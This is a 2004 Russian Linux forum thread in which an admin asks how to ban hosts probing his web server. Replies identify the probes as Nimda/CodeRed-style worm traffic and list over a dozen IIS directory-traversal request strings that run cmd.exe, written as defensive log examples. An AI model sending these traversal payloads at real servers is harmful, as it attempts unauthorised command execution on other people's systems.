LINUX.ORG.RU
ФорумAdmin

Как бороться с нападением.


0

0

Во тут от нехрен делать решил логи индейца посмотреть... и ужаснулся. В день было до 10 попыток атак, правдо, как понимаю без успешных. Но хочется что бы эти пиплы не оставались безнаказанными и полчали хотя бы какое то отмщение. Для чего хотелось бы предпринимать две меры: казать им мессагу о том что они кАхзлы и блокировать доступ с этих хостов на пару дней. Т.е. к примеру, пытаються какието скрипт кидсы запустить cmd.exe на линухе

62.93.64.54 - - [08/Nov/2004:00:53:44 +0300] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 337 "-" "-"
80.56.243.190 - - [10/Nov/2004:05:49:03 +0300] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 337 "-" "-"
200.63.20.147 - - [12/Nov/2004:03:27:24 +0300] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 337 "-" "-"

А я им мессагу, типа "I see YOU!!!" и бан на два дня.

Может кто знает, есть ли готовые средства, реализующие эти задачи.
Ну или как это можно сделать, желательно только средствами индейца и без применения файера.

Заранее спасибо!!!

★★★★★
Другая проблема с SARG'ом
SpamAssassin3.0.1

Анализируй скрипт раз в сколько-то минут и делай бан, по которому они будут видеть более другую страничку с твоей надписью.

jackill ★★★★★
()

Игра не стоит свеч.
Тебя сканят скрипты с заражённых виндовых машин.

Deleted
()

На заметку.

Это черви типа Nimda,CodRed и иже с нимИ:
админ виндового хоста с Internet Information Server и не подозревает о заражении или ему это фиолетово.
Подобные записи наблюдаю у себя в логах года 3-4, и бывает их до кучи,
замучаешься всех их блокировать.

Может попадаться и такое:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1x1c../winnt/system3 2/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

У тебя ведь *nix, не так ли :), не обращай внимания на _подобные_ записи и все.

Хотя, если логи из-за этого сильно растут, то это уже не так безобидно,
и вот такой совет есть:
http://pixelsusi.com/menu/3/
http://www.thesitewizard.com/news/coderediiworm.shtml

Вот еще интеренсая информация, как припахать squid для блокировки таких запросов.
http://squid.directnet.ru/mail-archive/squid-users/200109/0592.html

Sciurus
()
Ответ на: На заметку. от Sciurus

То-то и дело что ща их немного а потом может и зашкаливать, у мя конечно в кроне есть скриптик (из дефолтных) который раз в сутки архивит логи и делает текущий чистым, он всё же.

Ну да ладно, посмотрим, думаю не прорвуться :)

cyclon ★★★★★
() автор топика
Ответ на: комментарий от anonymous

> не прорвутся! ты главное IIS не ставь, и CMD.COM :))

А как же без них :) Обязательно поставлю 8)

cyclon ★★★★★
() автор топика

"Когда коту нечего делать, он себе яйца лижет"

У тебя всё равно нет CMD.EXE.

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
Другая проблема с SARG'ом
Admin
SpamAssassin3.0.1